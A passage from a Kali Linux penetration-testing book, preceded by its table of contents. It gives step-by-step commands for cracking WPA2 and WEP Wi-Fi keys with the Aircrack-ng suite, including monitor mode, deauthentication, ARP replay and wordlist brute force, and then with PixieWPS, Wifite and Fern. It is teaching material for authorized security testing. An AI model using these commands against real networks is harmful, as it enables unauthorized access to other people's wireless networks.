Table of Contents for
Kali Linux 2 – Assuring Security by Penetration Testing - Third Edition

Version ebook / Retour

Cover image for bash Cookbook, 2nd Edition Kali Linux 2 – Assuring Security by Penetration Testing - Third Edition by Gerard Johansen Published by Packt Publishing, 2016
  1. Cover
  2. Table of Contents
  3. Kali Linux 2 – Assuring Security by Penetration Testing Third Edition
  4. Kali Linux 2 – Assuring Security by Penetration Testing Third Edition
  5. Credits
  6. Disclaimer
  7. About the Authors
  8. About the Reviewer
  9. www.PacktPub.com
  10. Preface
  11. What you need for this book
  12. Who this book is for
  13. Conventions
  14. Reader feedback
  15. Customer support
  16. 1. Beginning with Kali Linux
  17. Kali Linux tool categories
  18. Downloading Kali Linux
  19. Using Kali Linux
  20. Configuring the virtual machine
  21. Updating Kali Linux
  22. Network services in Kali Linux
  23. Installing a vulnerable server
  24. Installing additional weapons
  25. Summary
  26. 2. Penetration Testing Methodology
  27. Vulnerability assessment versus penetration testing
  28. Security testing methodologies
  29. General penetration testing framework
  30. Information gathering
  31. The ethics
  32. Summary
  33. 3. Target Scoping
  34. Preparing the test plan
  35. Profiling test boundaries
  36. Defining business objectives
  37. Project management and scheduling
  38. Summary
  39. 4. Information Gathering
  40. Using public resources
  41. Querying the domain registration information
  42. Analyzing the DNS records
  43. Getting network routing information
  44. Utilizing the search engine
  45. Metagoofil
  46. Accessing leaked information
  47. Summary
  48. 5. Target Discovery
  49. Identifying the target machine
  50. OS fingerprinting
  51. Summary
  52. 6. Enumerating Target
  53. Understanding the TCP/IP protocol
  54. Understanding the TCP and UDP message format
  55. The network scanner
  56. Unicornscan
  57. Zenmap
  58. Amap
  59. SMB enumeration
  60. SNMP enumeration
  61. VPN enumeration
  62. Summary
  63. 7. Vulnerability Mapping
  64. Vulnerability taxonomy
  65. Automated vulnerability scanning
  66. Network vulnerability scanning
  67. Web application analysis
  68. Fuzz analysis
  69. Database assessment tools
  70. Summary
  71. 8. Social Engineering
  72. Attack process
  73. Attack methods
  74. Social Engineering Toolkit
  75. Summary
  76. 9. Target Exploitation
  77. Vulnerability and exploit repositories
  78. Advanced exploitation toolkit
  79. MSFConsole
  80. MSFCLI
  81. Ninja 101 drills
  82. Writing exploit modules
  83. Summary
  84. 10. Privilege Escalation
  85. Password attack tools
  86. Network spoofing tools
  87. Network sniffers
  88. Summary
  89. 11. Maintaining Access
  90. Working with tunneling tools
  91. Creating web backdoors
  92. Summary
  93. 12. Wireless Penetration Testing
  94. Wireless network recon
  95. Wireless testing tools
  96. Post cracking
  97. Sniffing wireless traffic
  98. Summary
  99. 13. Kali Nethunter
  100. Installing Kali Nethunter
  101. Nethunter icons
  102. Nethunter tools
  103. Third-party applications
  104. Wireless attacks
  105. HID attacks
  106. Summary
  107. 14. Documentation and Reporting
  108. Types of reports
  109. The executive report
  110. The management report
  111. The technical report
  112. Network penetration testing report (sample contents)
  113. Preparing your presentation
  114. Post-testing procedures
  115. Summary
  116. A. Supplementary Tools
  117. Web application tools
  118. Network tool
  119. Summary
  120. B. Key Resources
  121. Paid incentive programs
  122. Reverse engineering resources
  123. Penetration testing learning resources
  124. Exploit development learning resources
  125. Penetration testing on a vulnerable environment
  126. Online web application challenges
  127. Virtual machines and ISO images
  128. Network ports
  129. Index

Wireless testing tools

Kali Linux comes prepackaged with a number of both command line and GUI-based tools. These tools can be leveraged to convert our network interface into a network monitor, capture traffic and reverse the authentication passcode. The first of these tools, Aircrack-ng is a suite of tools. In addition, we will examine some other tools, both command line and GUI, that cover the full spectrum of tasks involved in wireless penetration testing.

Aircrack-ng

Aircrack-ng is a suite of tools that allow penetration testers to test the security of wireless networks. The suite includes tools that perform the following tasks related to wireless penetration testing:

  • Monitoring: These are tools designed specifically to capture traffic for later analysis. We will see in greater depth the ability of the Aircrack-ng tools to capture wireless traffic that we can use other third-party software such as Wireshark to examine.
  • Attacking: These tools are available to attack target networks. They include tools that allow for de-authentication attacks and replay attacks that take advantage of Aircrack-ng's ability to conduct packet injections, whereby Aircrack-ng actually sends packets into the wireless data stream to both clients and the access point as part of the attack.
  • Testing: These tools allow for the testing of wireless capability in hardware such as wireless cards.
  • Cracking: The Aircrack-ng toolset also has the capability to crack wireless Pre-shared Keys found in the WEP, WPA, and WP2.

In addition to the command-line tools, Aircrack-ng is used in a number of GUI-based tools. Having a solid understanding of how Aircrack-ng works will provide a solid foundation to the use of other tools we will explore later on in this chapter.

WPA Pre-shared Key cracking

Now we will use the Aircrack-ng suite of tools against a WPA2 wireless network. The process involves identifying our target network, capturing the four-way handshake, and then utilizing a wordlist to brute force the passcode that, in combination with the wireless network's SSID, is the Pre-shared Key. By cracking the passcode, we will then be able to authenticate to the target wireless network:

  1. The first step is to ensure that we have our wireless network card inserted and that it is working properly. For this, enter the following command into the command line:
    # iwconfig

    The command should output something similar to the following screenshot. If you do not see the wireless interface, ensure that it is properly configured:

    WPA Pre-shared Key cracking

    Here we have identified our wireless interface as wlan0. If you have more than one interface, you may see wlan1 as well. Be sure you are using the correct interface during these tests.

  2. The first tool we will use in the Aircrack-ng suite is airmon-ng. This tool allows us to change our wireless network card into what is known as monitor mode. This is much like placing a network interface into promiscuous mode. This allows us to capture more traffic than just what we would see with a normal wireless network card. To find the options available in airmon-ng, type the following:
    # airmon-ng –h

    This will produce the following:

    WPA Pre-shared Key cracking

    To change our wireless network card to monitor mode, we type the following:

    # airmon-ng start wlan0

    If successful, we will see this:

    WPA Pre-shared Key cracking

    If we also check the interfaces again using iwconfig, we can see that our interface has been changed as well:

    WPA Pre-shared Key cracking

    Sometimes, there are processes that interfere with putting the wireless card into monitor mode. When you execute the command airmon-ng start wlan0, you may see the following message:

    WPA Pre-shared Key cracking

    In this case, there are three possible processes that can interfere with the wireless card in monitor mode. In this case, we run the following command:

    # airmon-ng check kill

    This command identifies any potential process which may interfere with our attack:

    WPA Pre-shared Key cracking

    At this point, issuing the following commands will allow us to proceed:

    # pkill dhclient
# pkill wpa_supplicant

    This kills the processes that can interfere with airmon-ng. To re-enable these processes, type the following two commands into the command line, once you are done using the Aircrack-ng tools:

    # service networking start
# service network-manager start

    If there are still any issues, you can restart Kali Linux and these services will be re-enabled.

  3. In the next step, we need to scan for our target network. In the previous section, we discussed some of the reconnaissance necessary to identify potential target networks. In this case, we are going to use a tool called airodump-ng to identify our target network, as well as identify the BSSID it is using and the channel it is broadcasting on. To access the options for airodump-ng, type the following into the command prompt:
    # airodump-ng –help

    This will produce the following partial output:

    WPA Pre-shared Key cracking

    Now we will use the airodump-ng command to identify our target network. Type the following command:

    # airodump-ng wlan0mon

    Airodump-ng will run as long as you let it. Once you see the target network, press Ctrl - C to stop. You will see the following output. We have identified the network we are going to try to crack in red:

    WPA Pre-shared Key cracking
  4. The previous step has identified three key pieces of information for us. First, we have identified our target network, Aircrack_Wifi. Second, we have the BSSID, which is the MAC address for the target network, "44:94:FC:37:10:6E", and finally, the channel number, "6". The next stage is to capture wireless traffic to and from our target access point. Our goal is to capture the four-way handshake. To start capturing traffic, type the following into the command prompt:
    # - airodump-ng wlan0mon -c 6 --bssid 44:94:FC:37:10:6E -w wificrack

    The command tells airodump-ng to use the monitor interface to capture traffic for the BSSID and channel of our target network. The following screenshot shows the output of the command:

    WPA Pre-shared Key cracking

    As the command runs, we want to ensure that we capture that handshake. In the event that a client connects with a valid handshake, the command output shows the handshake as having been captured:

    WPA Pre-shared Key cracking

    In the event that you are not able to obtain the WPA handshake, look to see if there is a client accessing the network. In this case, we see a station attached to the target wireless network with the MAC address of 64:A5:C3:DA:30:DC. As this device has authenticated, it will most likely automatically reconnect in the event that the connection is temporarily lost. In this case, we can type the following command into the command line:

    # aireplay-ng -0 3  -a 44:94:FC:37:10:6E - c 64:A5:C3:DA:30:DC  wlan0mon

    The aireplay-ng command allows us to inject packets into the communication stream and de-authenticate the client. This will then force the client to complete a new WPA handshake that we can capture.

  5. After we have captured the handshake, we stop airodump-ng by pressing Ctrl - C. This stops airodump-ng. If we examine the root folder, we will see four files that have been created from our dump:
    WPA Pre-shared Key cracking

    We can examine the wificrack-01.cap file in Wireshark. If we drill down to the protocol EAPOL, we can actually see the four-way handshake that we have captured:

    WPA Pre-shared Key cracking

    Further examination shows the specific WPA key Nonce and associated information:

    WPA Pre-shared Key cracking
  6. Now that we have the captured handshake, we have the information necessary to attempt to crack the WPA Pre-shared Key. To do this, we use the tool Aircrack-ng. The following is the Aircrack-ng command:
    #aircrack-ng -w rockyou.txt -b 44:94:FC:37:10:6E wificrack-01.cap

    In the preceding command, we are identifying the target network's BSSID with the option –b. We then point towards the capture file, wificrack-01.cap. Finally, we utilize a wordlist in much the same way we would crack a password file. In this case, we will use the wordlist rockyou.txt. Once the command is set, hit Enter and aircrack-ng will start working:

    WPA Pre-shared Key cracking
  7. Aircrack-ng will utilize the rockyou.txt password list and try every combination against the capture file. If the passcode utilized in the Pre-shared Key is within the file, Aircrack-ng will produce the following message:
    WPA Pre-shared Key cracking

    From the preceding screenshot, we can see that the passcode "15SHOUTINGspiders" was in the rockyou.txt file we used to brute force. Also note, this took approximately 1 hour and 42 minutes, and ended up trying a total of 8,623,648 different passcodes. This technique can be attempted with any password list in much the same way we discussed in the password-cracking chapter. Just remember that the passcode can be anywhere from 8 to 63 characters in length. The amounts of combinations that are available are too numerous to try. This attack, though, is successful against easy to remember or short passphrases, much the same way password cracking is.

WEP cracking

The process for WEP cracking is very similar to that which was utilized for cracking WPA. First, identify the target network, capture traffic, which includes the authentication mechanism, and then point a brute force attack to reverse the key. There are some differences, though. As opposed to WPA cracking, where all we had to do was capture the four-way handshake, in WEP cracking we have to ensure we gather enough of the Initialization Vectors (IVs) to properly crack the WEP key. Although this may seem like a tall order, techniques are available to force this process and make the time necessary to sniff traffic as short as possible:

  1. To start the process of cracking WEP, we start by putting our wireless card into monitor mode in the same fashion as in WPA cracking. Type the following command:
    # airmong-ng start wlan0
  2. We then attempt to find our target network using the following command:
    # airodump-ng wlan0mon

    This produces the list of wireless networks:

    WEP cracking

    We have identified a target network running WEP with the BSSID of C0:56:27:DB:30:41. In the same vein, we need to make a note of that, as well as the channel that the access point is using, in this case, channel 11.

  3. Next, we get to capture the data on our target wireless network. Here we will use the Airodump-ng command to capture this data:
    # airodump-ng -c 11 -w belkincrack --bssid C0:56:27:DB:30:41

    This command points Airdump-ng to our target network on the appropriate channel. In addition, we are capturing traffic written to the file "belkincrack". This command produces the following output:

    WEP cracking

    Note

    Note that we do not see any data moving across this access point yet. This is important, as we need to capture data packets that contain Initialization Vectors in order to crack the WEP Key.

  4. Next, we have to fake an authentication to our target network. Essentially, we are using an Aircrack-ng tool called aireplay-ng to tell the access point that we have the proper WEP key and are ready to authenticate. Even though we do not have the proper key, the following command lets us fake an authentication and allows us to communicate with the WEP access point. Enter the following command:
    # aireplay-ng -1 0 -a C0:56:27:DB:30:41 wlan0mon

    In the preceding command, we are having Aireplay-ng fake the authentication with "-1", "0" as the retransmission time and "-a" as the BSSID of our target access point. The command produces the following:

    WEP cracking

    We now have the ability to communicate with the WEP access point.

  5. As we saw in step 3, there was very little data moving back and forth through the access point. We need to capture a great deal of data to ensure that we are able to grab those IVs and force a collision. We can again use aireplay-ng to increase the data to the access point. In the following command, we are going to conduct an ARP Request Replay Attack. In this attack, we are going to use Aireplay-ng to retransmit ARP requests back to the access point. Each time it does this it generates a new IV, increasing our chances of forcing that collision. Open a second command prompt and type the following:
    # aireplay-ng -3 -b C0:56:27:DB:30:41 wlan0mon

    In the preceding command, "-3" tells Aireplay-ng to conduct the ARP Request Replay Attack against the following network, "-b" on the specific interface, "wlanomon". Once the command runs, you need to force the ARP requests by pinging another host on the same network. This will force the ARP requests. Once that is started, you will see the following output:

    WEP cracking

    If we return to the first command prompt, where Airodump-ng is running, we see the data rate start increasing. In this case, over 16,000 IVs:

    WEP cracking
  6. Open a third terminal. Here we are going to start the WEP cracking. This can run while the Airodump-ng command is capturing IVs. To start the process, type the following command:
    # aircrack-ng belkincrack-01.cap

    Here we are simply pointing Aircrack-ng to the capture file that is running. Aircrack-ng starts working immediately, as the screenshot indicates:

    WEP cracking

    Aircrack-ng may indicate that there are not enough IVs and that it will re-attempt when there are enough IVs. As we see in the following screenshot, Aircrack-ng was able to determine the WEP key. All told, there were 15,277 IVs that had been captured, which were utilized for the cracking. In addition, 73253 keys were tested in less than three minutes:

    WEP cracking

    As we can see in this attack, with the right amount of wireless traffic and the Aircrack-ng suite of tools, we were able to determine the WEP key that allows us to authenticate to the network. It is the ease of this attack that has seen the move from WEP to WPA authentication. While WEP networks are becoming rarer in the wild because of this attack, you still may seem some. If you do come across them, this attack is fantastic for demonstrating to clients the significant security vulnerabilities present.

PixieWPS

PixieWPS is an offline brute forcing tool that is utilized to reverse the PIN of a WPS wireless access point. The name of PixieWPS comes from the Pixie-Dust attack that was discovered by Dominique Bongard. This vulnerability allows for the brute forcing of the WPS PIN. (For more detailed information on this vulnerability, see Bongard's presentation here: https://passwordscon.org/wp-content/uploads/2014/08/Dominique_Bongard.pdf.)

To access PixieWPS, type the following into the command prompt:

# pixiewps

The command will give you the different command options. In order for PixieWPS to work properly, a good deal of information must be obtained. This includes the following:

  • Enrollee public key
  • Registrant public key
  • Enrollee Hash-1
  • Enrollee Hash-2
  • Authentication session key
  • Enrollee nonce

Because of all these components that are required, PixieWPS is often run as part of another tool, such as Wifite.

Wifite

Wifite is an automated wireless penetration-testing tool that utilizes the tools associated with Aircrack-ng and the command-line tools Reaver and PixieWPS. This allows Wifite the ability to capture traffic and reverse the authentication credentials for WEP-, WPA-, and WPS-type wireless networks. Navigating to Applications | Wireless Attacks | Wifite or through the command line can start Wifite:

# wifite

Either will bring you to the initial screen:

Wifite

Wifite will automatically put the wireless card into monitor mode and then start to scan for wireless networks:

Wifite

Once you see the target network in the list, in this case the ESSID or broadcast SSID "Brenner," hit Ctrl - C. At that time, you will be prompted to enter either a single number or a range for testing. In this case, we enter the number 4 and hit Enter:

Wifite

Wifite automatically starts the WPS Pixie attack by capturing the necessary information. If successful, the following will display:

Wifite

If the WPS vulnerability is present, as in the case of the wireless network here, Wifite is able to determine both the WPA Key and the PIN.

Fern Wifi Cracker

The Fern Wifi Cracker is a GU- based tool written in Python for the testing of the security of wireless networks. There are currently two supported versions, a paid, professional version that has a great deal more functionality, and a free version that has limited functionality. The version included with Kali Linux requires Aircrack-ng and other wireless tools to function properly.

To start Fern, you can navigate to the Applications | Wireless Attacks | Fern Wifi Cracker, or type the following into the command prompt:

# fern-wifi-cracker

The following screenshot is the initial page that loads:

Fern Wifi Cracker

We will use the Fern Wifi Cracker to attack the same wireless network, Aircrack-Wifi, utilizing the GUI instead of having to use the command line in our attack.

  1. The first step is to select our interface. Click on the drop-down menu Select Interface. In this case, we will select wlan0. Fern will automatically place our interface into monitor mode for us:
    Fern Wifi Cracker
  2. Next, click on the button Scan for Access Points. Fern will automatically scan for wireless networks within range of your antenna. After the scanning is complete, the Wifi WEP and WiFi WPA buttons will change from grayed-out to colored, indicating wireless access points utilizing those security settings have been detected:
    Fern Wifi Cracker
  3. Clicking on the Wifi WPA button displays an attack panel, which contains a graphical representation of the WPA wireless access points that we can attack. In this case, we will select the button for Aircrack_Wifi:
    Fern Wifi Cracker
  4. The next screen provides details about the selected access point. In addition, Fern Wifi Cracker allows for a WPA attack or a WPS attack. In this case, we will stay with a WPA attack:
    Fern Wifi Cracker
  5. The only other step necessary is to set the passcode file that Fern Wifi Cracker will use to reverse the passcode. In this case, we have crafted a special Wi-Fi passcode list and point Fern Wifi Cracker to that text file:
    Fern Wifi Cracker
  6. Once the passcode file is set, click on the Wifi Attack button. Fern Wifi Cracker completes the entire process we previously covered in the Aircrack-ng section. This includes de-authenticating a client, then capturing the four-way handshake. Finally, Fern Wifi Cracker will move through the passcode file and if the passcode is in that file, the following message appears:
    Fern Wifi Cracker

Fern Wifi Cracker takes care of the backend work in terms of cracking Wi-Fi network and access points. While it may seem easier to use this tool, it is best to have a solid understanding of how Aircrack-ng works. Fern Wifi Cracker and other GUI-based Wi-Fi cracking programs are based around Aircrack-ng, and having a solid understanding of that toolset will allow you to fully understand what is happening behind the scenes with programs such as this.